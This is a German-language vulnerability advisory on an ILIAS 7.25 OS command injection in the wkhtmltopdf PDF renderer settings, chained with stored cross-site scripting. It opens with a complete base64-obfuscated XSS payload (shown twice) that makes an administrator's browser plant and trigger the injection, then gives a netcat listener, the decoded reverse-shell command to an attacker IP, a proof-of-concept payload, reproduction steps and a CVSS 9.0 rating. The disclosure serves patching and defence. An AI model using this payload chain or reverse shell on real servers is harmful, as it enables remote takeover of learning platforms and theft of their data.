<img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob('dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7'))>

    <img data-ip="123.456.78.910" id="sUhDeWhSwd" src=x onerror=eval(atob('dmFyIHBpPWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJzVWhEZVdoU3dkIiksYWk9cGkuZGF0YXNldC5pcCxzPShlLHQsbyk9Pm5ldyBQcm9taXNlKGE9Pnt2YXIgcz1uZXcgWE1MSHR0cFJlcXVlc3Q7cy5vcGVuKHQsZSwhMCkscy5zZXRSZXF1ZXN0SGVhZGVyKCJDb250ZW50LVR5cGUiLCJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKSxzLnJlc3BvbnNlVHlwZT0idGV4dCIscy5vbnJlYWR5c3RhdGVjaGFuZ2U9KCgpPT57NCE9cy5yZWFkeVN0YXRlfHwyMDAhPXMuc3RhdHVzJiYzMDIhPXMuc3RhdHVzfHxhKHMpfSkscy5zZW5kKG8pLHNldFRpbWVvdXQoKCk9PntzLmFib3J0KCksYSgpfSwxZTMpfSksYj13aW5kb3cubG9jYXRpb24ucHJvdG9jb2wrIi8vIit3aW5kb3cubG9jYXRpb24uaG9zdCx0PShkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgibW1fc2VhcmNoX2Zvcm0iKS5nZXRBdHRyaWJ1dGUoImFjdGlvbiIpLm1hdGNoKC9ydG9rZW49KFteJl0rKS8pfHxbXSlbMV07cyhiKyIvaWxpYXMucGhwP3JlZl9pZD02NyZhZG1pbl9tb2RlPXNldHRpbmdzJmNtZD1wb3N0JmNtZENsYXNzPWlsb2JqcGRmZ2VuZXJhdGlvbmd1aSZjbWROb2RlPTFkOm96JmJhc2VDbGFzcz1pbEFkbWluaXN0cmF0aW9uR1VJJmZhbGxiYWNrQ21kPXZpZXcmcnRva2VuPSIrdCwiUE9TVCIsInBhdGg9JTJGdXNyJTJGYmluJTJGd2todG1sdG9wZGYmZXh0ZXJuYWxfbGlua3M9MSZqYXZhc2NyaXB0X2RlbGF5PTIwMCslMjIxMjcuMC4wLjElMjIrJTJGdG1wJTJGeC5wZGYrJTI2JTI2K3JtKyUyRnRtcCUyRngucGRmKyUyNiUyNislMkZiaW4lMkZiYXNoKy1jKyUyN2Jhc2grLWkrJTNFJTJGZGV2JTJGdGNwJTJGIithaSsiJTJGMTIzNCswJTNFJTI2MSUyNyslMjMmc2VydmljZT1Qb3J0Zm9saW8mcHVycG9zZT1Db250ZW50RXhwb3J0JnJlbmRlcmVyPVdraHRtbFRvUGRmJmNtZCU1QnNhdmVDb25maWclNUQ9U3BlaWNoZXJuIikudGhlbigoKT0+e2NvbnNvbGUubG9nKCJbK10gUGF5bG9hZCBhZGRlZCB0byB2dWxuZXJhYmxlIG1vZHVsZS4iKSxzKGIrIi9pbGlhcy5waHA/bmV3X3R5cGU9cHJ0ZiZjbWQ9cG9zdCZjbWRDbGFzcz1pbG9ianBvcnRmb2xpb2d1aSZjbWROb2RlPTk5OnZmOnA3JmJhc2VDbGFzcz1pbERhc2hib2FyZEdVSSZydG9rZW49MjljOTFmZjg4MDJkYTdhNWQ1MTQ2MzFkOTkwOWU2NzUiLCJQT1NUIiwidGl0bGU9eCZtb2RlPW1vZGVfc2NyYXRjaCZwdHlwZT1wYWdlJmZwYWdlPXgmY21kJTVCc2F2ZSU1RD1FcnN0ZWxsZW4iKS50aGVuKGU9Pntjb25zb2xlLmxvZygiWytdIFBvcnRmb2xpbyBjcmVhdGVkLiIpO3ZhciBvPShlLnJlc3BvbnNlVVJMLm1hdGNoKC9bPyZdcHJ0X2lkPShbXiZdKykvKXx8W10pWzFdO3MoYisiL2lsaWFzLnBocD9wcnRfaWQ9IitvKyImY21kPXBvc3QmY21kQ2xhc3M9aWxvYmpwb3J0Zm9saW9ndWkmY21kTm9kZT05OTp2ZjpwNyZiYXNlQ2xhc3M9aWxEYXNoYm9hcmRHVUkmZmFsbGJhY2tDbWQ9ZXhwb3J0UERGJnJ0b2tlbj0iK3QsIkdFVCIsIiIpLnRoZW4oKCk9Pntjb25zb2xlLmxvZygiWytdIFBERiBleHBvcnQgdHJpZ2dlcmVkLiBQYXlsb2FkIGV4ZWN1dGVkLiIpLHdpbmRvdy5sb2NhdGlvbi5ocmVmPWJ9KX0pfSk7'))>

Kopieren und fügen Sie die geänderte Payload aus Ihrem Editor in das Textelement auf der Webseite ein und speichern Sie abschließend die Änderung über den Button "Speichern und zurückkehren".

**Schritt 5:**

Führen Sie auf Ihrem PC den folgenden netcat Befehl aus, um über den Port 1234 auf den Verbindungsaufbau mit dem Webserver warten.

nc -nlvp 1234

    nc -nlvp 1234

**Schritt 6:**

Loggen Sie sich **als Administrator** ein und öffnen Sie entweder die zuvor erstellte Portfolioseite des Users "testuser" über einen Direktlink oder über die Portfoliosuche unter Persönlicher Bereich > Portfolio > Portfolios anderer Benutzer.

Die hinterlegte Payload aus Schritt 3 wird beim Aufruf der Portfolioseite direkt ausgeführt. Überprüfen Sie Ihr CLI:

Der Webserver hat eine Verbindung durch eine Reverse Shell mit dem PC aufgebaut. Als potenzieller Angreifer haben Sie mit den Rechten des User www-data Kontrolle über den Webserver, auf dem ILIAS installiert ist.

**Was genau macht die Payload?**

Folgender Befehl wird bei einer Ausführung der OS Command Injection über die Funktion exec() in der Methode execQuoted() der Klasse ilUtil (/Services/Utilities/classes/class.ilUtil.php) gänzlich ausgeführt:

/usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c 'bash -i >/dev/tcp/XXX.XXX.XXX.XXX/1234 0>&1' # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie "PHPSESSID" "cv06phhvn81aa30gsnku0e6fl5" --cookie "ilClientId" "myilias" /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1 

    /usr/bin/wkhtmltopdf --zoom 1 --enable-external-links --disable-forms --orientation Portrait --page-size A4 --javascript-delay 200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && /bin/bash -c 'bash -i >/dev/tcp/X.X.X.X/1234 0>&1' # --margin-bottom 0.5cm --margin-left 0.5cm --margin-right 2cm --margin-top 2cm --quiet --cookie "PHPSESSID" "cv06phhvn81aa30gsnku0e6fl5" --cookie "ilClientId" "myilias" /var/www/ilias.local/files/myilias/temp/tmp650f626e2affe.html /var/www/ilias.local/files/myilias/temp/tmp650f626e2b056.pdf 2>&1 

Um die Payload zu verstehen, hilft die Synopsis von wkhtmltopdf:  
wkhtmltopdf [GLOBAL OPTION]... [OBJECT]... <output file>

Der CLI-Befehl beginnend mit wkhtmltopdf erscheint mit allen folgenden [GLOBAL OPTION] Parameter bis zu --javascript-delay wie erwartet normal. Die Payload aus Schritt 3 übergibt ab dieser Stelle den Wert 200 für die voranstehende Option und definiert anschließend direkt das [OBJECT] mit der localhost IP als Quelle _(könnte auch eine beliebige URL oder ein existenter Pfad zu einer Datei sein)_. Folgend wird mit /tmp/x.pdf das <output file> bestimmt, welches durch && rm /tmp/x.pdf direkt wieder gelöscht wird _(das Löschen der Datei ist nicht zwingend notwendig)_. Es folgt die Reverse Shell in der Befehlskette, welche mit der IP des Angreifers über den Port 1234 eine Verbindung aufbaut: && /bin/bash -c 'bash -i >/dev/tcp/X.X.X.X/1234 0>&1' . Abschließend werden alle nachfolgenden Zeichen des CLI-Befehls mit # auskommentiert.

**3.2 Reproduktionsschritte (als Admin)****Schritt 1:**

Installieren Sie eine ILIAS-Version7.25 2023-09-12 Instanz auf einem Testsystem. Loggen Sie sich als Administrator ein.

Navigieren Sie anschließend auf die Seite Administration -> PDF-Erstellung und klicken Sie unter dem Tab Einstellungen auf den Button Konfiguriere Renderer in der Sektion Portfolio / ContentExport.

**Schritt 2:**

Kopieren Sie folgende Payload:

200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && echo "Payload executed successfully" > /tmp/poc.txt #

    200 "127.0.0.1" /tmp/x.pdf && rm /tmp/x.pdf && echo "Payload executed successfully" > /tmp/poc.txt #

> Um die erfolgreiche Ausführung einer Injektion simpel überprüfen zu können, wird mit dieser Payload eine Datei "poc.txt" im Verzeichnis "/tmp" auf dem Webserver abgelegt. Siehe Was genau macht die Payload? unter Punkt 3.1 für eine detaillierte Aufschlüsslung technischer Details.

Fügen Sie die kopierte Payload in das Eingabefeld Javascript Verzögerung ein.

**Schritt 3:**

Führen Sie einen PDF-Export über ein beliebiges Modul aus. Zum Beispiel über Portfolio. Erstellen Sie hierzu ein Portfolio und führen Sie einen PDF-Export aus:

**Schritt 4:**

Prüfen Sie auf dem Webserver, ob die Payload erfolgreich ausgeführt wurde:

**Voraussetzungen für die Ausnutzung**

Die Voraussetzungen für den aufgeschlüsselten Worst Case (Punkt 3.1) lauten wie folgt:

*   Ein Angreifer benötigt Zugriff auf einen Account mit mindestens den Rechten eines normalen Users.
*   Die vom Angreifer hinterlegte Payload muss durch eine User-Interaktion eines hoch priviligierten Nutzers (Administrator) über einen Seitenaufruf ausgelöst werden.
*   Die Funktionalität HTML/Javascript erlauben muss für ein beliebiges Modul, für welches ein User Schreibrechte hat, enabled sein.

Sollte die Funktionalität HTML/Javascript erlauben abgeschaltet sein, besteht die Schwachstelle OS Command Injection als solche weiterhin, kann dann aber nur mit Administrationsrechten oder (falls gegeben) durch eine andere XSS Schwachstelle ausgenutzt werden.

**Auswirkungen**

Diese Schwachstelle kann erhebliche Auswirkungen auf die Sicherheit der betroffenen ILIAS-Installation und des zugrunde liegenden Betriebssystem haben. Alle auf dem Server gespeicherten Daten, Dateien und Komponenten, die der Webserver-User mit gegebenen Rechten lesen, schreiben oder ausführen kann, sind potenziell betroffen. Ein Angreifer, der diese Schwachstelle erfolgreich ausnutzt, könnte zudem das System beschädigen oder weitere Angriffe (z.B. auf externe Dienste wie LDAP durch einsehbare Credentials) durchführen.

**Klassifikation**

CVSS: **9.0 Critical** (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)

**Attack Vector (AV): N**  
Es handelt sich um einen Netzwerkangriff. Die verwundbare Komponente ist "aus der Ferne ausnutzbar" und wird als ein Angriff betrachtet, der auf Protokollebene über das Internet stattfindet.

**Attack Complexity (AC): L**  
Besondere Zugangsbedingungen oder mildernde Umstände bestehen nicht. Es MUSS jedoch für eine erfolgreiche Durchführung die Konfiguration "HTML/Javascript erlauben" gesetzt sein. Wenn eine bestimmte Konfiguration für den Erfolg eines Angriffs erforderlich ist, wird die anfällige Komponente nach CVSSv3.1 Spezifikation unter der Annahme bewertet, dass sie sich in dieser Konfiguration befindet.

**Privileges Required (PR): L**  
Der Angreifer benötigt Privilegien, die grundlegende Benutzerfunktionen eines Users bereitstellen.

**User Interaction (UI): R**  
Der platzierte Schadcode muss für einen erfolgreichen Angriff durch eine User-Interaktion eines Administrators ausgeführt werden.

**Scope (S): C**  
Die anfällige Komponente ist die Webanwendung: Die Webanwendung überführt Systembefehle durch Benutzereingaben in eine exec() Funktion. Die betroffene Komponente ist der Webserver: Auf diesen erlangt der Angreifer Zugriff. Es kann sowohl auf das Dateisystem zugegriffen werden, als auch beliebig gespeicherte Daten aus anderen Komponenten (z.B. Datenbanken) extrahiert werden, welche bei normaler Nutzung der Web-Applikation nicht verfügbar sein sollten. Auch können auf dem Server befindliche Programme bzw. Binaries ausgeführt werden.

**Confidentiality (C): H**  
Bei einen erfolgreichen Angriff kommt es zu einem totalen Verlust der Vertraulichkeit. Alle Ressourcen innerhalb der betroffenen Komponente und weiterführend Komponenten des Betriebssystems werden dem Angreifer offengelegt.

**Integrity (I): H**  
Bei einem erfolgreichen Angriff kommt es zu einem totalen Verlust der Integrität. Der Angreifer ist in der Lage, alle geschützten Dateien der betroffenen Komponente und weiterführend Dateien aus Komponenten des Betriebssystems zu verändern.

**Availability (A): H**  
Bei einem erfolgreichen Angriff ist der Angreifer in der Lage, den Zugang zu den Ressourcen der betroffenen Komponente und weiterführend aus Komponenten des Betriebssystems vollständig zu verweigern. Zum Beispiel durch das Löschen von Dateien.

email: contact@rehmeinfosec.de | threema: WTZ4BZN9

Tag

#mac